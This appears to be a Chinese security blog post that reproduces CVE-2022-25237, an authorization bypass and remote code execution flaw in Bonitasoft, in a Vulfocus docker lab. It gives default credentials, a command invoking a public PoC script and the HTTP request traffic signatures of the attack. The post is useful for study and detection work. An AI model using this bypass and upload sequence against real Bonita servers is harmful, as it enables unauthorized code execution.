码农知识堂 - 1000bd
  •   Python
  •   PHP
  •   JS/TS
  •   JAVA
  •   C/C++
  •   C#
  •   GO
  •   Kotlin
  •   Swift
  • CVE-2022-25237 Bonitasoft Platform RCE漏洞复现


    目录

    0x01 声明:

    0x02 简介:

    0x03 漏洞概述:

    0x04 影响版本:

    For community(社区版):

    For subscription(订阅版):

    0x05 环境搭建:

    Vulfocus环境搭建:

    漏洞环境搭建:

    访问页面:

    0x06 漏洞复现:

    创建用户:

    利用POC:

    0x07 流量分析:

    特征一:

    客户端:

    服务端:

    特征二:

    客户端:

    服务端:

    特征三:

    客户端:

    服务端:

    特征四:

    客户端:

    服务端:

    0x08 修复建议:

    0x09参考连接:


    0x01 声明:

            仅供学习参考使用,请勿用作违法用途,否则后果自负。

    0x02 简介:

        Bonitasoft 是一个业务自动化平台,可以更轻松地在业务流程中构建、部署和管理自动化应用程序;Bonita 是一个用于业务流程自动化和优化的开源和可扩展平台。

    0x03 漏洞概述:

        在Bonitasoft Authorization漏洞版本,由于 API 授权过滤器中配置问题,通过精心构造的的字符串附加到 API URL,能够绕过权限认证。拥有普通用户权限的攻击者在绕过权限认证后,将恶意代码部署到服务器上,进行远程代码执行。

    0x04 影响版本:

    For community(社区版):

    2022.1-u0 (7.14.0) 以下

    For subscription(订阅版):

    2022.1-u0 (7.14.0) 以下

    2021.2-u4 (7.13.4) 以下

    2021.1-0307 (7.12.11) 以下

    7.11.7 以下

    0x05 环境搭建:

    Vulfocus环境搭建:

    参考这篇文章:

    (7条消息) Vulfocus漏洞靶场搭建_Evan Kang的博客-CSDN博客https://blog.csdn.net/qq_44281295/article/details/127022162

    漏洞环境搭建:

    在Vulfocus环境后台执行:

    docker pull bonita:7.13.0

    访问页面:

    0x06 漏洞复现:

    创建用户:

    默认账号密码:install/install

    利用POC:

    下载地址:

    https://github.com/RhinoSecurityLabs/CVEs/tree/master/CVE-2022-25237

    python CVE-2022-25237.py poc poc http://192.168.119.155:43378/bonita 'uname -a'

    0x07 流量分析:

    特征一:

    客户端:

    Url:POST /bonita/loginservice HTTP/1.1

    Data:username=poc&password=poc

    服务端:

    Status_code:HTTP/1.1 204

    特征二:

    客户端:

    Url: POST /bonita/API/pageUpload;i18ntranslation?action=add HTTP/1.1

    Content-Disposition: form-data; name="file"; filename="rce_api_extension.zip"

    服务端:

    Status_code:HTTP/1.1 200

    Data:{"filename":"rce_api_extension.zip","tempPath":"tmp_9332037509706769580.zip","contentType":"application\/octet-stream"}

    特征三:

    客户端:

    1. Url:POST /bonita/API/portal/page/;i18ntranslation HTTP/1.1
    2. Data:{"contentName": "rce_api_extension.zip", "pageZip": "tmp_9332037509706769580.zip"}

    服务端:

    Status_code:HTTP/1.1 200

    Data:{"processDefinitionId":"","updatedBy":"1","urlToken":"custompage_resourceNameRestAPI","displayName":"RCE","lastUpdateDate":"2022-10-19 09:12:08.054","description":"REST API to manage resourceName","creationDate":"2022-10-19 09:12:08.054","contentName":"rce_api_extension.zip","isHidden":"false","isEditable":"true","createdBy":"1","isProvided":"false","id":"35","isRemovable":"true","contentType":"apiExtension"}

    特征四:

    客户端:

    Url:GET /bonita/API/extension/rce?p=0&c=1&cmd='uname HTTP/1.1

    服务端:

    Status_code:HTTP/1.1 403

    0x08 修复建议:

    更新至安全无漏洞版本。

    0x09参考连接:

    https://rhinosecuritylabs.com/application-security/cve-2022-25237-bonitasoft-authorization-bypass/

  • 相关阅读:
    索引与事务
    Gateway 接口参数加解密
    机器学习(18)——分类算法(补充)
    oracle客户端的安装(SQL Developer)
    Linux内核 RTC时间架构
    STM32项目工程的搭建
    一文了解linux都有哪些常用命令
    易混淆、易遗忘的知识点记录
    Java IDE MyEclipse 使用教程:创建一个新的 REST Web 服务
    Maven:一个下载jar依赖失败的问题解决方案
  • 原文地址:https://blog.csdn.net/qq_44281295/article/details/127412330
  • 最新文章
  • 攻防演习之三天拿下官网站群
    数据安全治理学习——前期安全规划和安全管理体系建设
    企业安全 | 企业内一次钓鱼演练准备过程
    内网渗透测试 | Kerberos协议及其部分攻击手法
    0day的产生 | 不懂代码的"代码审计"
    安装scrcpy-client模块av模块异常,环境问题解决方案
    leetcode hot100【LeetCode 279. 完全平方数】java实现
    OpenWrt下安装Mosquitto
    AnatoMask论文汇总
    【AI日记】24.11.01 LangChain、openai api和github copilot
  • 热门文章
  • 十款代码表白小特效 一个比一个浪漫 赶紧收藏起来吧!!!
    奉劝各位学弟学妹们,该打造你的技术影响力了!
    五年了,我在 CSDN 的两个一百万。
    Java俄罗斯方块,老程序员花了一个周末,连接中学年代!
    面试官都震惊,你这网络基础可以啊!
    你真的会用百度吗?我不信 — 那些不为人知的搜索引擎语法
    心情不好的时候,用 Python 画棵樱花树送给自己吧
    通宵一晚做出来的一款类似CS的第一人称射击游戏Demo!原来做游戏也不是很难,连憨憨学妹都学会了!
    13 万字 C 语言从入门到精通保姆级教程2021 年版
    10行代码集2000张美女图,Python爬虫120例,再上征途
Copyright © 2022 侵权请联系2656653265@qq.com    京ICP备2022015340号-1
正则表达式工具 cron表达式工具 密码生成工具

京公网安备 11010502049817号